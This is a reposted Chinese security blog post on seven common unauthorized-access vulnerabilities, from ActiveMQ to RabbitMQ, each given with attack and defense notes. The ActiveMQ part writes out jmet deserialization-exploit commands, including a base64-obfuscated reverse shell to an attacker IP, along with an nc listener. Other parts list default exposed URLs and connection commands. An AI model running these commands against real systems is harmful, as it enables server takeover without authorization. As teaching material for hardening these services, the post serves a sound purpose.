浅谈常见未授权访问漏洞系列（三）

浅谈常见未授权访问漏洞系列（三）
2023-1-18 23:54:21 Author: 渗透安全团队(查看原文) 阅读量:22 收藏

今天我们继续来聊一聊常见未授权访问漏洞系列三，每一次的记录都能让自己有所收获，每一次的实战记录笔记会让自己对这个漏洞更加的熟悉。

系列一在这：浅谈常见未授权访问漏洞系列（一）。

系列二在这：浅谈常见未授权访问漏洞系列（二）。

一、常见未授权访问漏洞系列三

1、Apache Active MQ 未授权访问

（1）攻

Apache ActiveMQ是一款由Apache所研发的中间件，也是目前非常流行的一款开源消息服务器；在搭建过程中，由于没有设置账号密码等权限机制导致未授权访问，紧接着利用其反序列化漏洞获取服务器权限。

ActiveMQ默认端口为8161未授权恶意链接：http://IP地址:8161/admin/

后续利用其反序列化漏洞进行拿下服务器权限：

使用jmet进行漏洞利用:jemt下载地址:https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar紧接着将我们的jemt作为消息发给我我们的目标机器，我们的目标机器则会添加一个event的队列java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP地址 12345我们访问以下链接，成功在队列中看到消息，则这个漏洞可以利用http://IP地址:8161/admin/browse.jsp?JMSDestination=event紧接着我们将命令直接换成反弹shell命令拿下服务器java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCUyMC1pJTNFL2Rldi90Y3AvSVAvNjY2NiUyMDAlM0UlMjYx}|{base64,-d}|{bash,-i}" -Yp ROME IP 12345nc -lvvp 6666

（2）防

①设置账号密码等验证机制，例如我们可以修改配置文件中的conf/jetty.xml文件，将文件里面的bean id参数为securityConstraint下的authenticate修改值为true可以防止未授权访问，还有不使用默认admin/admin口令，。

②设置黑白名单访问设置，杜绝不确定攻击。

2、Hadoop Yarn 未授权访问

（1）攻

Hadoop是一个分布式系统框架，而Yarn是我们Hadoop集群的资源管理系统，由于我们搭建该资源管理系统时没有对路径做好权限防护措施，导致存在未授权访问漏洞，后续对其进行命令执行反弹shell进行服务器权限的获取。

恶意链接：http://IP地址:8088/cluster

后续利用exp：

（2）防

①设置账号密码等验证机制。

②设置黑白名单访问设置，杜绝不确定攻击。

③升级我们的Hadoop Yarn版本并开启Kerberos认证机制。

3、Jupyter Notebook 未授权访问

（1）攻

Jupyter Notebook是一款交互式的笔记本，在搭建的时候没有进行账号密码的配置导致任意用户可以使用其中的Terminal可以直接执行系统命令，可以直接反弹shell获取服务器权限。

恶意链接：http://IP地址或域名:端口/http://IP地址或域名:端口/tree?

（2）防

①设置账号密码等验证机制。

②设置黑白名单访问设置，杜绝不确定攻击。

4、Kubernetes API Server未授权访问

（1）攻

Kubenetes在我们日常搭建过程中，客户端默认端口为6443，web界面端口http为8080，https为10250端口，由于没有配置好权限机制导致我们攻击者可以直接访问Kubenetes默认端口或者搭建好服务设置的端口进行未授权访问，获取环境变量、容器信息等敏感信息。

http://IP:8080/http://IP:8080/apihttp://IP:8080/dashboardhttp://IP:8080/uihttp://IP:8080/podshttps://IP:10250/https://IP:10250/apihttps://IP:10250/dashboardhttps://IP:10250/uihttps://IP:10250/pods

（2）防

①设置账号密码等验证机制。

②设置黑白名单访问设置，杜绝不确定攻击。

5、MongoDB 未授权访问

（1）攻

MongoDB是一款分布式文件存储数据库，在默认搭建该数据库服务器时未对其进行账号密码的设置，导致存在未授权访问漏洞，获取数据库数据信息以及权限。

mongo --host IP地址 --port 端口号（默认端口为27017）

（2）防

①在配置文件admin.system.users中设置账号密码等验证机制。

②设置黑白名单访问设置，杜绝不确定攻击。

6、Redis 未授权访问

（1）攻

根据官方介绍，Redis 是一款基于内存亦可持久化的日志型以及Key-Value数据库，它的默认端口号为6379，在搭建Redis 时默认没有进行账号密码配置，导致存在未授权访问，获取数据库数据信息以及权限。

redis-cli -h IP地址

（2）防

①设置账号密码等验证机制，并且修改默认连接端口。

②设置黑白名单访问设置，杜绝不确定攻击。

③避免一定危害建议不要以ROOT用户权限启动Redis服务。

7、RabbitMQ 未授权访问

（1）攻

RabbitMQ 是一款开源消息服务器，一般在搭建过程未设置账号密码机制导致未授权访问漏洞。

（2）防

①设置账号密码等验证机制，并且不使用默认弱账户guest/guest。

②设置黑白名单访问设置，杜绝不确定攻击，最好建议放在内网环境。

二、总结

今天在又在授权实战中复现了7种未授权访问漏洞，发现未授权访问漏洞真的可以帮助攻击者快速拿下目标权限，不仅仅方便攻击者对目标渗透测试的时间，还可以从未授权访问中对目标系统更加的了解。

未授权访问漏洞系列未完，待续......

★

付费圈子

欢迎加入星球！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关注有礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

群聊 | 技术交流群-群除我佬

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247496343&idx=2&sn=dcbfcbbcfd276a5f3519fc6ef94e0f28&chksm=c1760f38f601862edd25d822f70259354fc772c5c3caa3690bc21c87ee011242d9db0622abe0#rd
如有侵权请联系:admin#unsafe.sh